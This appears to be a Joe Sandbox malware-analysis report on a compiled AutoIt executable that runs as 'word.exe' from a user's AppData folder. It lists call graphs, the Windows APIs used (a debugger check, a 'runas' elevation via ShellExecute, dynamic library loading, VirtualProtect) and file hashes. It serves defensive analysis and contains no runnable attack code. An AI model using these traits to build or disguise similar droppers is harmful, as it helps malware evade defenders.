GetCurrentProcess TerminateProcess 82631->82628 82632 4736db 82639 4736ff 82632->82639 82713 40d030 78 API calls 82632->82713 82634 473731 82640 473744 FreeLibrary 82634->82640 82641 47374b 82634->82641 82635 4736f1 82714 46b945 136 API calls 2 library calls 82635->82714 82638->82594 82639->82634 82715 40d030 78 API calls 82639->82715 82716 46b945 136 API calls 2 library calls 82639->82716 82640->82641 82641->82594 82644 40eff5 CreateFileW 82643->82644 82645 4299bf 82643->82645 82646 40f017 82644->82646 82645->82646 82647 4299c4 CreateFileW 82645->82647 82646->82594 82647->82646 82648 4299ea 82647->82648 82735 40e0d0 SetFilePointerEx SetFilePointerEx 82648->82735 82650 4299f5 82650->82646 82717 45335b 78 API calls 82651->82717 82653 463c5d 82718 442c52 82 API calls _wcslen 82653->82718 82656 463c72 82657 40c060 77 API calls 82656->82657 82663 463cac 82656->82663 82658 463c8e 82657->82658 82719 4608ce 77 API calls _memcpy_s 82658->82719 82660 463ca4 82661 40c740 77 API calls 82660->82661 82661->82663 82662 463cf7 82662->82606 82663->82662 82720 462f5a 89 API calls __wcsicoll 82663->82720 82665 453063 113 API calls 82664->82665 82666 463d99 82665->82666 82667 463de0 82666->82667 82668 463dca 82666->82668 82722 40c760 80 API calls 82667->82722 82721 453081 113 API calls 82668->82721 82671 463dd0 LoadLibraryW 82673 463e09 82671->82673 82672 463de7 82685 463e19 82672->82685 82723 40c760 80 API calls 82672->82723 82675 463e3e 82673->82675 82673->82685 82677 463e4e 82675->82677 82678 463e7b 82675->82678 82676 463dfb 82676->82685 82724 40c760 80 API calls 82676->82724 82725 40d500 82677->82725 82731 40c760 80 API calls 82678->82731 82683 463e82 GetProcAddress 82687 463e90 82683->82687 82685->82613 82686 463e62 GetProcAddress 82689 463e79 82686->82689 82687->82685 82688 463edf 82687->82688 82687->82689 82688->82685 82692 463eef FreeLibrary 82688->82692 82689->82687 82732 403470 77 API calls _memcpy_s 82689->82732 82691 463eb4 82693 40d500 77 API calls 82691->82693 82692->82685 82694 463ebd 82693->82694 82733 45efe7 79 API calls ctype 82694->82733 82696 463ec8 GetProcAddress 82734 401330 ctype 82696->82734 82699 457a4c 82698->82699 82705 45785f _strcat _wcslen _wcscpy ctype 82698->82705 82706 410d40 82699->82706 82700 453081 113 API calls 82700->82705 82701 443576 80 API calls 82701->82705 82702 40c760 80 API calls 82702->82705 82703 4138ba 69 API calls _malloc 82703->82705 82704 40f580 79 API calls 82704->82705 82705->82699 82705->82700 82705->82701 82705->82702 82705->82703 82705->82704 82709 410d55 82706->82709 82707 410ded VirtualProtect 82708 410dbb 82707->82708 82708->82627 82708->82628 82709->82707 82709->82708 82710->82624 82711->82631 82712->82632 82713->82635 82714->82639 82715->82639 82716->82639 82717->82653 82718->82656 82719->82660 82720->82662 82721->82671 82722->82672 82723->82676 82724->82673 82726 41171a 77 API calls 82725->82726 82727 40d515 82726->82727 82728 41171a 77 API calls 82727->82728 82729 40d521 82728->82729 82730 45efe7 79 API calls ctype 82729->82730 82730->82686 82731->82683 82732->82691 82733->82696 82734->82688 82735->82650 82736->82567 82737 42919b 82742 40ef10 82737->82742 82740 411421 __cinit 76 API calls 82741 4291aa 82740->82741 82743 41171a 77 API calls 82742->82743 82744 40ef17 82743->82744 82745 42ad48 82744->82745 82750 40ef40 76 API calls __cinit 82744->82750 82747 40ef2a 82751 40e470 82747->82751 82750->82747 82752 40c060 77 API calls 82751->82752 82753 40e483 GetVersionExW 82752->82753 82754 4021e0 77 API calls 82753->82754 82755 40e4bb 82754->82755 82777 40e600 82755->82777 82762 42accc 82763 42ad28 GetSystemInfo 82762->82763 82767 42ad38 GetSystemInfo 82763->82767 82764 40e557 GetCurrentProcess 82797 40ee30 LoadLibraryA GetProcAddress 82764->82797 82765 40e56c 82765->82767 82790 40eee0 82765->82790 82770 40e5c9 82794 40eea0 82770->82794 82773 40e5e0 82775 40e5f1 FreeLibrary 82773->82775 82776 40e5f4 82773->82776 82774 40e5dd FreeLibrary 82774->82773 82775->82776 82776->82740 82778 40e60b 82777->82778 82779 40c740 77 API calls 82778->82779 82780 40e4c2 82779->82780 82781 40e620 82780->82781 82782 40e62a 82781->82782 82783 42ac93 82782->82783 82784 40c740 77 API calls 82782->82784 82785 40e4ce 82784->82785 82785->82762 82786 40ee70 82785->82786 82787 40e551 82786->82787 82788 40ee76 LoadLibraryA 82786->82788 82787->82764 82787->82765 82788->82787 82789 40ee87 GetProcAddress 82788->82789 82789->82787 82791 40e5bf 82790->82791 82792 40eee6 LoadLibraryA 82790->82792 82791->82763 82791->82770 82792->82791 82793 40eef7 GetProcAddress 82792->82793 82793->82791 82798 40eec0 LoadLibraryA GetProcAddress 82794->82798 82796 40e5d3 GetNativeSystemInfo 82796->82773 82796->82774 82797->82765 82798->82796 82799 4803f4 82800 48046c 82799->82800 82801 4804a7 82799->82801 82802 480499 82800->82802 82803 480473 82800->82803 82804 40c060 77 API calls 82801->82804 82832 47fea8 120 API calls 82802->82832 82805 480478 82803->82805 82806 48048b 82803->82806 82826 4804b0 82804->82826 82805->82801 82808 48047d 82805->82808 82831 47f6ef 120 API calls __itow_s 82806->82831 82830 47e8db 120 API calls 82808->82830 82810 40df50 77 API calls 82810->82826 82813 4092c0 VariantClear 82815 480b51 82813->82815 82814 480486 82814->82813 82816 4092c0 VariantClear 82815->82816 82817 480b5a 82816->82817 82818 4019e0 78 API calls 82818->82826 82820 40c3e0 77 API calls 82820->82826 82821 40e6d0 78 API calls 82821->82826 82822 409210 VariantClear 82822->82826 82823 480564 82838 45e62e 118 API calls 3 library calls 82823->82838 82824 40c760 80 API calls 82824->82826 82826->82810 82826->82814 82826->82818 82826->82820 82826->82821 82826->82822 82826->82823 82826->82824 82833 4533dc 77 API calls 82826->82833 82834 45e85e 78 API calls 82826->82834 82835 40e7e0 78 API calls 82826->82835 82836 476958 78 API calls 82826->82836 82837 47f529 119 API calls 82826->82837 82830->82814 82831->82814 82832->82814 82833->82826 82834->82826 82835->82826 82836->82826 82837->82826 82838->82814 82839 4291df 82844 40ddd0 82839->82844 82842 411421 __cinit 76 API calls 82843 4291ee 82842->82843 82845 40c060 77 API calls 82844->82845 82846 40de43 82845->82846 82851 40f0d0 82846->82851 82848 40dee0 82849 40df04 82848->82849 82854 40dd50 82848->82854 82849->82842 82860 40f110 RegOpenKeyExW 82851->82860 82855 40dd81 82854->82855 82859 40dd58 _memcpy_s ctype 82854->82859 82858 41171a 77 API calls 82855->82858 82856 41171a 77 API calls 82857 40dd5f 82856->82857 82857->82848 82858->82859 82859->82856 82861 40f13c RegQueryValueExW RegCloseKey 82860->82861 82862 40f0ee 82860->82862 82861->82862 82862->82848

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                      • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                      • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                    • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\word.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                      • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 0040D7D6
                                                                    • MessageBoxA.USER32 ref: 00431AAB
                                                                    • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00431B0E
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00431B3F
                                                                    • GetForegroundWindow.USER32 ref: 00431B8B
                                                                    • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                      • Part of subcall function 004101F0: GetSysColorBrush.USER32 ref: 004101F9
                                                                      • Part of subcall function 004101F0: LoadCursorW.USER32 ref: 00410209
                                                                      • Part of subcall function 004101F0: LoadIconW.USER32 ref: 0041021F
                                                                      • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410232
                                                                      • Part of subcall function 004101F0: LoadIconW.USER32 ref: 00410245
                                                                      • Part of subcall function 004101F0: LoadImageW.USER32 ref: 0041026A
                                                                      • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 00410415
                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32 ref: 0041043E
                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                      • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                      • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                    • String ID: @GH$@GH$C:\Users\user\AppData\Roaming\word.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                    • API String ID: 2493088469-3974260756
                                                                    • Opcode ID: 46ef362de9b3ca25341f5e487a7b891603662a7c26df16e66142cae839022532
                                                                    • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                    • Opcode Fuzzy Hash: 46ef362de9b3ca25341f5e487a7b891603662a7c26df16e66142cae839022532
                                                                    • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 350 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 359 40e506-40e509 350->359 360 42accc-42acd1 350->360 363 40e540-40e555 call 40ee70 359->363 364 40e50b-40e51c 359->364 361 42acd3-42acdb 360->361 362 42acdd-42ace0 360->362 366 42ad12-42ad20 361->366 367 42ace2-42aceb 362->367 368 42aced-42acf0 362->368 381 40e557-40e573 GetCurrentProcess call 40ee30 363->381 382 40e579-40e5a8 363->382 369 40e522-40e525 364->369 370 42ac9b-42aca7 364->370 380 42ad28-42ad2d GetSystemInfo 366->380 367->366 368->366 375 42acf2-42ad06 368->375 369->363 371 40e527-40e537 369->371 373 42acb2-42acba 370->373 374 42aca9-42acad 370->374 378 42acbf-42acc7 371->378 379 40e53d 371->379 373->363 374->363 376 42ad08-42ad0c 375->376 377 42ad0e 375->377 376->366 377->366 378->363 379->363 384 42ad38-42ad3d GetSystemInfo 380->384 381->382 392 40e575 381->392 382->384 385 40e5ae-40e5c3 call 40eee0 382->385 385->380 390 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 385->390 394 40e5e0-40e5ef 390->394 395 40e5dd-40e5de FreeLibrary 390->395 392->382 396 40e5f1-40e5f2 FreeLibrary 394->396 397 40e5f4-40e5ff 394->397 395->394 396->397
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32 ref: 0040E495
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                    • GetNativeSystemInfo.KERNEL32(?,?), ref: 0040E5D3
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                    • String ID: pMH
                                                                    • API String ID: 2923339712-2522892712
                                                                    • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                    • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                    • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                    • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                    APIs
                                                                    • _set_new_mode.LIBCMT ref: 0040D88C
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,002F2EB8), ref: 0040D8B9
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040D8CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: FreeInfoLibraryParametersSystem_set_new_mode
                                                                    • String ID: x./
                                                                    • API String ID: 1188159508-91608207
                                                                    • Opcode ID: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                    • Instruction ID: 2b4412acdce639bfbf0f9e0c9ecf3f694f94d165ded01d265c3c64edb54a61d9
                                                                    • Opcode Fuzzy Hash: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                    • Instruction Fuzzy Hash: C2215EB19183009FC700EF56D88150ABBE4FB98354F44497EF849A72A2D735A945CB9A
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 0040EB7B
                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                    • API String ID: 2574300362-3542929980
                                                                    • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                    • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                    • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                    • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                    • __wsplitpath.LIBCMT ref: 00410C61
                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                    • _wcsncat.LIBCMT ref: 00410C78
                                                                    • __wmakepath.LIBCMT ref: 00410C94
                                                                      • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                    • _wcscpy.LIBCMT ref: 00410CCC
                                                                    • RegOpenKeyExW.KERNEL32 ref: 00410CE9
                                                                    • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                    • _wcscat.LIBCMT ref: 00429C43
                                                                    • _wcslen.LIBCMT ref: 00429C55
                                                                    • _wcslen.LIBCMT ref: 00429C66
                                                                    • _wcscat.LIBCMT ref: 00429C80
                                                                    • _wcsncpy.LIBCMT ref: 00429CC0
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                    • String ID: 81$81$Include$Software\AutoIt v3\AutoIt$\$d1$1
                                                                    • API String ID: 1004883554-2673214454
                                                                    • Opcode ID: 3093b2b4a56f68cee952ec89ca31fb29d3b09d34d5411c72ffee891605ce48f1
                                                                    • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                    • Opcode Fuzzy Hash: 3093b2b4a56f68cee952ec89ca31fb29d3b09d34d5411c72ffee891605ce48f1
                                                                    • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                    APIs
                                                                      • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                      • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                    • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                    • timeGetTime.WINMM ref: 00409880
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                    • String ID:
                                                                    • API String ID: 3219444185-0
                                                                    • Opcode ID: efe588fe2b6a9670aaffdf515401a346dd7f1223fa7bab7fec05d02e8bd57726
                                                                    • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                    • Opcode Fuzzy Hash: efe588fe2b6a9670aaffdf515401a346dd7f1223fa7bab7fec05d02e8bd57726
                                                                    • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_fseek_wcscpy
                                                                    • String ID: FILE
                                                                    • API String ID: 3888824918-3121273764
                                                                    • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                    • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                    • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                    • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32 ref: 004101F9
                                                                    • LoadCursorW.USER32 ref: 00410209
                                                                    • LoadIconW.USER32 ref: 0041021F
                                                                    • LoadIconW.USER32 ref: 00410232
                                                                    • LoadIconW.USER32 ref: 00410245
                                                                    • LoadImageW.USER32 ref: 0041026A
                                                                    • RegisterClassExW.USER32 ref: 004102C6
                                                                      • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                      • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                      • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                      • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                      • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                      • Part of subcall function 004102F0: LoadIconW.USER32 ref: 004103B1
                                                                      • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00970000,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                    • String ID: #$0$PGH$x./
                                                                    • API String ID: 423443420-3979191025
                                                                    • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                    • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                    • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                    • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _fseek.LIBCMT ref: 004525DA
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                    • __fread_nolock.LIBCMT ref: 00452618
                                                                    • __fread_nolock.LIBCMT ref: 00452629
                                                                    • __fread_nolock.LIBCMT ref: 00452644
                                                                    • __fread_nolock.LIBCMT ref: 00452661
                                                                    • _fseek.LIBCMT ref: 0045267D
                                                                    • _malloc.LIBCMT ref: 00452689
                                                                    • _malloc.LIBCMT ref: 00452696
                                                                    • __fread_nolock.LIBCMT ref: 004526A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1911931848-0
                                                                    • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                    • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                    • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                    • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
